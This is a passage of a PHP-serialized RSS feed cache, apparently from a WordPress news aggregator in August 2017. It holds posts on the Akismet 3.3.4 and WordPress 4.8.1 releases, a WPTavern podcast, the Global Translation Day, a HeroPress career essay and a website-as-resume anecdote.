Resume";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:22:"https://ma.tt/?p=47486";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:40:"https://ma.tt/2017/08/website-as-resume/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:1422:"<p>The illustrious Chance the Rapper was looking for a new intern.</p>\n<blockquote class="twitter-tweet">\n<p lang="en" dir="ltr">I\'m looking for an intern, someone with experience in putting together decks and writing proposals</p>\n<p>&mdash; Lil Chano From 79th (@chancetherapper) <a href="https://twitter.com/chancetherapper/status/846441791385677824">March 27, 2017</a></p></blockquote>\n<p></p>\n<p>Some people responded with regular resumes, replying as images, but Negele &#8220;Hopsey&#8221; Hospedales <a href="https://chancehirehospey.com/">decided to make a website on WordPress.com</a>:</p>\n<blockquote class="twitter-tweet">\n<p lang="en" dir="ltr">maybe I\'m extra, but I think resumes are old fashion. I built a website instead. <a href="https://twitter.com/hashtag/ChanceHireHospey?src=hash">#ChanceHireHospey</a><a href="https://t.co/DmYvxAQu61">https://t.co/DmYvxAQu61</a></p>\n<p>&mdash; madebyhosp. (@Hospey) <a href="https://twitter.com/Hospey/status/846612517723947008">March 28, 2017</a></p></blockquote>\n<p></p>\n<p>The happy ending is <a href="http://www.billboard.com/articles/news/lifestyle/7882484/chance-the-rapper-intern-interview-Negele-Hospedales">written up in Billboard: he got the gig and went on tour with Chance</a>. Hospey wrote a great article on it himself: <a href="https://hospeyhowto.com/2017/07/29/how-to-work-for-your-favourite-rapper/">How To Work For Your Favourite Rapper</a>.</p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Thu, 03 Aug 2017 10:23:48 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:4:"Matt";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:36;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:53:"Akismet: Akismet WordPress Plugin 3.3.4 Now Available";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:31:"http://blog.akismet.com/?p=1955";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:66:"http://blog.akismet.com/2017/08/03/akismet-wordpress-plugin-3-3-4/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:1570:"<p>Version 3.3.4 of <a href="http://wordpress.org/plugins/akismet/">the Akismet plugin for WordPress</a> is now available.</p>\n<p>3.3.4 has a few fixes and enhancements that should make everyone&#8217;s lives better:</p>\n<ul>\n<li>URL previews in the WordPress admin will now begin preloading when the cursor moves near the link so they appear faster once you move your mouse over the link.</li>\n<li>When a comment is caught by both the Comment Blacklist and Akismet, Akismet will now leave it in Trash instead of moving it out of Trash and into Spam.</li>\n<li>A bug has been fixed that was preventing a notice from being shown when a site&#8217;s firewall was preventing it from connecting to Akismet&#8217;s servers.</li>\n<li>Akismet will no longer log all of its debug information unless a new constant (<code>AKISMET_DEBUG</code>) is also enabled, even if <code>WP_DEBUG</code> and <code>WP_DEBUG_LOG</code> are both enabled.</li>\n</ul>\n<p>To upgrade, visit the Updates page of your WordPress dashboard and follow the instructions. If you need to download the plugin zip file directly, links to all versions are available in <a href="http://wordpress.org/plugins/akismet/">the WordPress plugins directory</a>.</p><br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/akismet.wordpress.com/1955/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/akismet.wordpress.com/1955/" /></a> <img alt="" border="0" src="http://pixel.wp.com/b.gif?host=blog.akismet.com&blog=116920&post=1955&subd=akismet&ref=&feed=1" width="1" height="1" />";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Thu, 03 Aug 2017 04:25:22 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:17:"Christopher Finke";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:37;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:61:"WPTavern: WPWeekly Episode 283 – A Visit From St. Gutenberg";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:58:"https://wptavern.com?p=73870&preview=true&preview_id=73870";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:67:"https://wptavern.com/wpweekly-episode-283-a-visit-from-st-gutenberg";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:2823:"<p>In this episode, <a href="https://jjj.blog/">John James Jacoby</a> and I start off the show with an adaptation of &#8216;<a href="https://www.poets.org/poetsorg/poem/visit-st-nicholas">A Visit from St. Nicholas</a>&#8216; created by Clement Clarke Moore. Since we didn&#8217;t have a guest, Jacoby and I opened up about our personal lives which turned into a conversation about remote working from home. We also discussed the news of the week, including SiteLock&#8217;s acquisition of Patchman, WordPress 4.8.1, and Adobe discontinuing Flash.</p>\n<h2>Stories Discussed:</h2>\n<p><a href="https://wptavern.com/a-fix-for-wordpress-weekly-subscribers-using-pocket-casts">A Fix for WordPress Weekly Subscribers Using Pocket Casts</a><br />\n<a href="https://wptavern.com/wordpress-4-8-1-adds-a-dedicated-custom-html-widget">WordPress 4.8.1 Adds a Dedicated Custom HTML Widget</a><br />\n<a href="https://wptavern.com/sitelock-acquires-patchmans-malware-and-vulnerability-detection-technology-expands-wordpress-customer-base-to-4-million">SiteLock Acquires Patchman’s Malware and Vulnerability Detection Technology, Expands WordPress Customer Base to 4 Million</a><br />\n<a href="https://wptavern.com/adobe-to-discontinue-flash-support-and-updates-in-2020">Adobe to Discontinue Flash Support and Updates in 2020</a><br />\n<a href="https://wptavern.com/blog-passes-100000-registrations-66-5-of-purchased-domains-are-in-use">.blog Passes 100,000 Registrations, 66.5% of Purchased Domains are in Use</a><br />\n<a href="https://wptavern.com/buddypress-2-9-adds-ability-to-safely-edit-a-groups-permalink">BuddyPress 2.9 Adds Ability to Safely Edit A Group’s Permalink</a><br />\n<a href="https://wptavern.com/new-dobby-plugin-captures-and-hides-unwanted-wordpress-admin-notices">New Dobby Plugin Captures and Hides Unwanted WordPress Admin Notices</a></p>\n<h2>Picks of the Week:</h2>\n<p>An entertaining <a href="https://wordpress.org/support/topic/catastophe-how-to-destroy-wordpress-in-2-weeks/">one-star review</a> of Gutenberg based on &#8216;A Visit from St. Nicholas&#8217; poem by Clement Clarke Moore.<b></b></p>\n<h2>WPWeekly Meta:</h2>\n<p><strong>Next Episode:</strong> Wednesday, August 9th 3:00 P.M. Eastern</p>\n<p><strong>Subscribe To WPWeekly Via Itunes: </strong><a href="https://itunes.apple.com/us/podcast/wordpress-weekly/id694849738" target="_blank" rel="noopener">Click here to subscribe</a></p>\n<p><strong>Subscribe To WPWeekly Via RSS: </strong><a href="https://wptavern.com/feed/podcast" target="_blank" rel="noopener">Click here to subscribe</a></p>\n<p><strong>Subscribe To WPWeekly Via Stitcher Radio: </strong><a href="http://www.stitcher.com/podcast/wordpress-weekly-podcast?refid=stpr" target="_blank" rel="noopener">Click here to subscribe</a></p>\n<p><strong>Listen To Episode #283:</strong><br />\n</p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Thu, 03 Aug 2017 01:25:51 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:13:"Jeff Chandler";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:38;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:103:"WPTavern: WordPress Polyglots Team Fuels International Community Growth with 3rd Global Translation Day";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:29:"https://wptavern.com/?p=73789";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:114:"https://wptavern.com/wordpress-polyglots-team-fuels-international-community-growth-with-3rd-global-translation-day";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:6613:"<p><a href="https://i1.wp.com/wptavern.com/wp-content/uploads/2016/04/wordpress-global-translation-day.png?ssl=1"><img /></a></p>\n<p>The <a href="https://wptranslationday.org/" target="_blank">3rd Global WordPress Translation Day</a> has been set for September 30, 2017. The success of previous events has generated momentum to continue the 24-hour global translation sprints and has also increased the visibility of the Polyglots team&#8217;s contributions. These sprints have provided a catalyst for the team&#8217;s growth from 5,000 contributors in April 2015 to 17,000 in November 2016. The greater WordPress community has also grown in tandem, as reliable translations are the lifeblood of international WordPress usage.</p>\n<p>One way of measuring the growth of the global community is the checking the status of local meetups. After the addition of the dashboard events widget in WordPress 4.8, the community has seen a sharp rise in <a href="https://www.meetup.com/pro/wordpress/" target="_blank">meetup group</a> growth, according to <a href="https://wordpress.org/news/2017/08/the-month-in-wordpress-july-2017/" target="_blank">recent stats</a> from the community team. The widget displays local WordPress events for logged-in users.</p>\n<p>&#8220;It’s safe to say that the widget has achieved its goals admirably — since WordPress 4.8 was released a little over a month ago, 31 new meetup groups have been formed with 15,647 new members across the whole program,&#8221; Hugh Lashbrooke said. &#8220;This is compared to 19 new groups and only 7,071 new members in the same time period last year.&#8221;</p>\n<p><a href="https://i2.wp.com/wptavern.com/wp-content/uploads/2017/08/wordpress-meetups.png?ssl=1"><img /></a></p>\n<p>Much of that growth can be attributed to the growth of the international WordPress community, which has continued to advance the concept of <a href="https://make.wordpress.org/community/2017/07/18/regional-camps-take-2/" target="_blank">regional WordCamps</a> for countries and continents. These include events such as WordCamp Netherlands, WordCamp Europe, and the planned WordCamp Asia, that bring larger groups of WordPress enthusiasts together around a common region.</p>\n<p>In 2014, the WordPress community hosted 80 WordCamps in 29 countries. At the conclusion of 2016, there were 115 total WordCamps hosted in 41 different countries.</p>\n<p><a href="https://w3techs.com/technologies/details/cm-wordpress/all/all" target="_blank">WordPress&#8217; usage</a> continues to grow every year, and the percentage of non-English-speaking users is also expanding. In 2014, non-English WordPress downloads surpassed English downloads for the first time.</p>\n<p>Last July, <a href="https://wptavern.com/wordpress-stats-page-redesigned-adds-new-data-on-installs-by-langauge" target="_blank">53.9% of WordPress sites used the English (US) locale</a>. That number has dropped to 50% as of today, as international usage continues to rise.</p>\n<a href="https://i2.wp.com/wptavern.com/wp-content/uploads/2017/08/wordpress-locales-july-2017.png?ssl=1"><img /></a>Stats from WordPress.org July 2017\n<p>Rahul Bansal&#8217;s lightning talk at WordCamp Europe identified one example of <a href="http://wordpress.tv/2017/06/21/rahul-bansal-how-translation-sprints-helps-bring-in-new-contributors/" target="_blank">how the translation sprints are bringing in new contributors in India</a>. In the past, meetup groups have had a problem with retaining new users, who often come to their first meetup lacking both a sense of belonging and confidence in contributing. Bansal and other Polyglots members had an idea to remove this block to contributing by getting new users involved in translating WordPress.</p>\n<p>During the last global translation day event, Bansal helped organize a local group to translate WordPress core into Hindi, Marathi, and Gujarati. They also translated the subtitles for the WordPress 4.6 release video. The key was that the leaders did not participate in translating strings but rather focused on guiding new translators &#8211; 90% ended up being first-time contributors.</p>\n<p>WordPress 4.6 shipped with support for 50 languages and the complete Gujarati translation was added to core just a few days before the release. Its inclusion in the release made WordPress more accessible to approximately 65.5 million Gujarati speakers worldwide.</p>\n<div class="embed-wrap"></div>\n<p>The 3rd Global WordPress Translation Day falls on the same day that the <a href="https://www.un.org/press/en/2017/ga11914.doc.htm" target="_blank">United Nations has designated as International Translation Day</a>, a new initiative to recognize &#8220;the role of professional translation in connection with nations and fostering peace, understanding, and development.&#8221;</p>\n<p>WordPress has only just begun to explore its potential to democratize publishing and hasn&#8217;t even cracked the ice in terms of usage across the world&#8217;s most popular languages. Sites using the various Chinese and Arabic locales make up less than 2% of international usage, despite these languages having more than a billion native speakers combined. If WordPress adoption takes off in these parts of the world, it will create a whole new wave of contribution and vastly expand the world market for commercial plugins and themes. The Polyglots team are on the forefront of making this possible.</p>\n<p>The first two WPTranslationDay events were held in April and November of 2016. The <a href="https://wptavern.com/2nd-global-wordpress-translation-day-brings-780-translators-together-across-133-locales" target="_blank">second event had a 74% increase in participation over the first</a> with a total of 780 translators participating. This year organizers are aiming to host more local translation sprints to surpass the 67 held in November. If you want to join the Polyglots team to help serve WordPress&#8217; growing international community, you can attend or <a href="https://docs.google.com/spreadsheets/d/1Fecq1StAPn9nDgabGMLdXiqszWkkxP6-5cM5YHXwLPg/edit?usp=drivesdk" target="_blank">organize one of the local events</a>, <a href="https://www.crowdcast.io/e/gwtd3/" target="_blank">watch sessions live on CrowdCast</a>, <a href="https://docs.google.com/spreadsheets/d/1Fecq1StAPn9nDgabGMLdXiqszWkkxP6-5cM5YHXwLPg/edit?usp=drivesdk" target="_blank">organize a remote event</a>, <a href="https://wptranslationday.org/call-for-speaker/" target="_blank">become a speaker</a>, or start translating at <a href="http://translate.wordpress.org" target="_blank">translate.wordpress.org</a>.</p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Thu, 03 Aug 2017 00:36:19 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:13:"Sarah Gooding";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:39;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:45:"Dev Blog: WordPress 4.8.1 Maintenance Release";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:34:"https://wordpress.org/news/?p=4875";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:71:"https://wordpress.org/news/2017/08/wordpress-4-8-1-maintenance-release/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:2547:"<p>After over 13 million downloads of WordPress 4.8, we are pleased to announce the immediate availability of WordPress 4.8.1, a maintenance release.</p>\n<p>This release contains 29 maintenance fixes and enhancements, chief among them are fixes to the rich Text widget and the introduction of the Custom HTML widget. For a full list of changes, consult the <a href="https://codex.wordpress.org/Version_4.8.1">release notes</a>, the <a href="https://core.trac.wordpress.org/query?status=closed&milestone=4.8.1&group=component">tickets closed</a>, and the <a href="https://core.trac.wordpress.org/log/branches/4.8?rev=41210&stop_rev=40891">list of changes</a>.</p>\n<p><a href="https://wordpress.org/download/">Download WordPress 4.8.1</a> or visit <strong>Dashboard → Updates</strong> and simply click “Update Now.” Sites that support automatic background updates are already beginning to update to WordPress 4.8.1.</p>\n<p>Thanks to everyone who contributed to 4.8.1:<br />\n<a href="https://profiles.wordpress.org/adamsilverstein/">Adam Silverstein</a>, <a href="https://profiles.wordpress.org/afercia/">Andrea Fercia</a>, <a href="https://profiles.wordpress.org/azaozz/">Andrew Ozz</a>, <a href="https://profiles.wordpress.org/atanasangelovdev/">Atanas Angelov</a>, <a href="https://profiles.wordpress.org/gitlost/">bonger</a>, <a href="https://profiles.wordpress.org/boonebgorges/">Boone Gorges</a>, <a href="https://profiles.wordpress.org/bor0/">Boro Sitnikovski</a>, <a href="https://profiles.wordpress.org/dlh/">David Herrera</a>, <a href="https://profiles.wordpress.org/jnylen0/">James Nylen</a>, <a href="https://profiles.wordpress.org/jbpaul17/">Jeffrey Paul</a>, <a href="https://profiles.wordpress.org/jmdodd/">Jennifer M. Dodd</a>, <a href="https://profiles.wordpress.org/kadamwhite/">K. Adam White</a>, <a href="https://profiles.wordpress.org/obenland/">Konstantin Obenland</a>, <a href="https://profiles.wordpress.org/melchoyce/">Mel Choyce</a>, <a href="https://profiles.wordpress.org/r-a-y/">r-a-y</a>, <a href="https://profiles.wordpress.org/greuben/">Reuben Gunday</a>, <a href="https://profiles.wordpress.org/rinkuyadav999/">Rinku Y</a>, <a href="https://profiles.wordpress.org/sa3idho/">Said El Bakkali</a>, <a href="https://profiles.wordpress.org/sergeybiryukov/">Sergey Biryukov</a>, <a href="https://profiles.wordpress.org/nomnom99/">Siddharth Thevaril</a>, <a href="https://profiles.wordpress.org/timmydcrawford/">Timmy Crawford</a>, and <a href="https://profiles.wordpress.org/westonruter/">Weston Ruter</a>.</p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Wed, 02 Aug 2017 21:26:25 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:12:"Weston Ruter";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:40;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:52:"HeroPress: Your Skills Speak Louder Than Your Gender";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:56:"https://heropress.com/?post_type=heropress-essays&p=2006";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:126:"https://heropress.com/essays/skills-speak-louder-gender/#utm_source=rss&utm_medium=rss&utm_campaign=skills-speak-louder-gender";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:6358:"<img width="960" height="480" src="http://20094-presscdn.pagely.netdna-cdn.com/wp-content/uploads/2018/08/080217-min-1024x512.jpg" class="attachment-large size-large wp-post-image" alt="Pull Quote: Do not put up with discrimination, talk about it openly, and stand against it." /><blockquote><p>I don’t usually talk or even think about gender in relation to my career. I’m a female developer but I’ve never really felt like that is anything too special and more importantly I have rarely felt like my gender mattered.</p></blockquote>\n<p>As a kid I thought I would become an artist or a dancer. It wasn’t until I had to choose the university to apply to that I decided to go with something more practical so I went with Computer Science. I hadn’t really done much with code before that, except for having a Lord of the Rings discussion board with my friends and making doing some HTML &amp; CSS related to that. After the first year of school I was already making my first WordPress sites to paying customers.</p>\n<p>After graduating I have been a full-time employee in a developer position as well as a freelancer. I’ve worked both in Finland and in the USA. During my career I have actually been surprised how easy it has been for me, a woman in the male-dominated industry, to find work, to get promoted and to get recognition. I have not faced much discrimination or prejudice related to my gender, and the great professionals I have got to work with have always been interested in my skills beyond anything else.</p>\n<p>So how come there is such a huge gender gap in the industry? I’ve witnessed it myself many times &#8211; being the only woman in a WordPress meetup of thirty people, or not having to queue at all to women’s bathroom in a tech conference with over 1000 attendees. There is no doubt that women are as capable as men, so whatever the reason is I really hope the future women would see the fun, problem-solving profession of a programmer as a great career option.</p>\n<h3>A few tips for an aspiring developer</h3>\n<p>I want to encourage everyone considering a developer career to take action and go for it. The tech industry is full of very clever and inspiring people and I promise you will not be bored. More importantly it is a safe career choice: the job market is great and the companies and the different tech communities are generally very open and welcoming. If you want to be a woman person in tech, remember:</p>\n<ol>\n<li><strong>Do not accept <del>gender</del> any discrimination</strong><br />\nOne great thing about being a developer is the current status of the job market. There is a lot more demand than there is supply, so you can choose who you work with. Do not put up with discrimination, talk about it openly and stand against it. I’ve been lucky enough not to face much judgement based on my gender. I’ve worked both in Finland and in the US and the biggest challenges I’ve faced have been clients that have been surprised that a woman is the tech lead in their project. Usually after a few hours of working together the prejudice disappears &#8211; it has always been enough to just be professional and stay true to myself.</li>\n<li><strong>Be active and give back</strong><br />\nIt is important to be active in your community and help other people out in their careers. Everyone benefits from a striving local community and also it is a great opportunity to make new connections and open new doors in your career.Being an organiser of WordCamp Finland &amp; WordPress Helsinki meetup group for the last few years has really given me more than it has taken. I’ve learnt a lot and met many inspiring people, and it has opened up new career options for me too. The best thing tho has been just seeing the Finnish community grow so much and get more active by the day.</li>\n<li><strong>It&#8217;s skills that matter</strong><br />\nThis is really what it comes down to. Are you developing your skills constantly? Are you willing to keep up with the industry? You do not have to be the best developer, but you should be confident in your skills and be willing to always learn new ones. I believe that this is the only thing that matters in the end &#8211; not your gender.</li>\n</ol>\n<div class="rtsocial-container rtsocial-container-align-right rtsocial-horizontal"><div class="rtsocial-twitter-horizontal"><div class="rtsocial-twitter-horizontal-button"><a title="Tweet: Your Skills Speak Louder Than Your Gender" class="rtsocial-twitter-button" href="https://twitter.com/share?text=Your%20Skills%20Speak%20Louder%20Than%20Your%20Gender&via=heropress&url=https%3A%2F%2Fheropress.com%2Fessays%2Fskills-speak-louder-gender%2F" rel="nofollow" target="_blank"></a></div></div><div class="rtsocial-fb-horizontal fb-light"><div class="rtsocial-fb-horizontal-button"><a title="Like: Your Skills Speak Louder Than Your Gender" class="rtsocial-fb-button rtsocial-fb-like-light" href="https://www.facebook.com/sharer.php?u=https%3A%2F%2Fheropress.com%2Fessays%2Fskills-speak-louder-gender%2F" rel="nofollow" target="_blank"></a></div></div><div class="rtsocial-linkedin-horizontal"><div class="rtsocial-linkedin-horizontal-button"><a class="rtsocial-linkedin-button" href="https://www.linkedin.com/shareArticle?mini=true&url=https%3A%2F%2Fheropress.com%2Fessays%2Fskills-speak-louder-gender%2F&title=Your+Skills+Speak+Louder+Than+Your+Gender" rel="nofollow" target="_blank" title="Share: Your Skills Speak Louder Than Your Gender"></a></div></div><div class="rtsocial-pinterest-horizontal"><div class="rtsocial-pinterest-horizontal-button"><a class="rtsocial-pinterest-button" href="https://pinterest.com/pin/create/button/?url=https://heropress.com/essays/skills-speak-louder-gender/&media=https://heropress.com/wp-content/uploads/2018/08/080217-min-150x150.jpg&description=Your Skills Speak Louder Than Your Gender" rel="nofollow" target="_blank" title="Pin: Your Skills Speak Louder Than Your Gender"></a></div></div><a rel="nofollow" class="perma-link" href="https://heropress.com/essays/skills-speak-louder-gender/" title="Your Skills Speak Louder Than Your Gender"></a></div><p>The post <a rel="nofollow" href="https://heropress.com/essays/skills-speak-louder-gender/">Your Skills Speak Louder Than Your Gender</a> appeared first on <a rel="nofollow" href="https://heropress.com">HeroPress</a>.</p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Wed, 02 Aug 2017 11:00:33 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:14:"Sonja Jaakkola";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:41;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:43:"Dev Blog: The Month in WordPress: July 2017";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:34:"https://wordpress.org/news/?p=4885";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:68:"https://wordpress.org/news/2017/08/the-month-in-wordpress-july-2017/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:5643:"<p>After a particularly busy month <a href="https://wordpress.org/news/2017/07/the-month-in-wordpress-june-2017/">in June</a>, things settled down a bit in the WordPress world — WordPress 4.8’s release went very smoothly, allowing the Core team to build up some of the community infrastructure around development. Read on for more interesting news from around the WordPress world in July.</p>\n<hr />\n<h2>Weekly meeting for new core contributors</h2>\n<p>Onboarding new contributors is a persistent issue for most WordPress contribution teams. While every team welcomes any new contributors, the path to getting deeply involved can be tricky to find at times.</p>\n<p>This month, the Core team implemented a fantastic new initiative: <a href="https://make.wordpress.org/core/2017/06/30/announcing-a-weekly-new-contributors-meeting/">weekly meetings for new core contributors</a> as a way to encourage involvement and foster fresh contributions. The meetings not only focus on bugs suited to first-time contributors, they also make space for experienced contributors to help out individuals who may be new to developing WordPress core.</p>\n<p>The meetings are held every Wednesday at 19:00 UTC in the #core channel in the <a href="https://make.wordpress.org/chat/">Making WordPress Slack group</a>.</p>\n<h2>Increased focus on PHP practices in WordPress core</h2>\n<p>In bringing people together to improve WordPress core, a new channel in the <a href="https://make.wordpress.org/chat/">Making WordPress Slack group</a> named #core-php is designed to focus on PHP development in the project.</p>\n<p>Along with this increased concentration on PHP, a <a href="https://make.wordpress.org/core/2017/07/06/announcement-for-weekly-php-meetings/">new weekly meeting is now taking place</a> every Monday at 18:00 UTC in #core-php to improve WordPress core’s PHP practices.</p>\n<h2>Sharp rise in meetup group 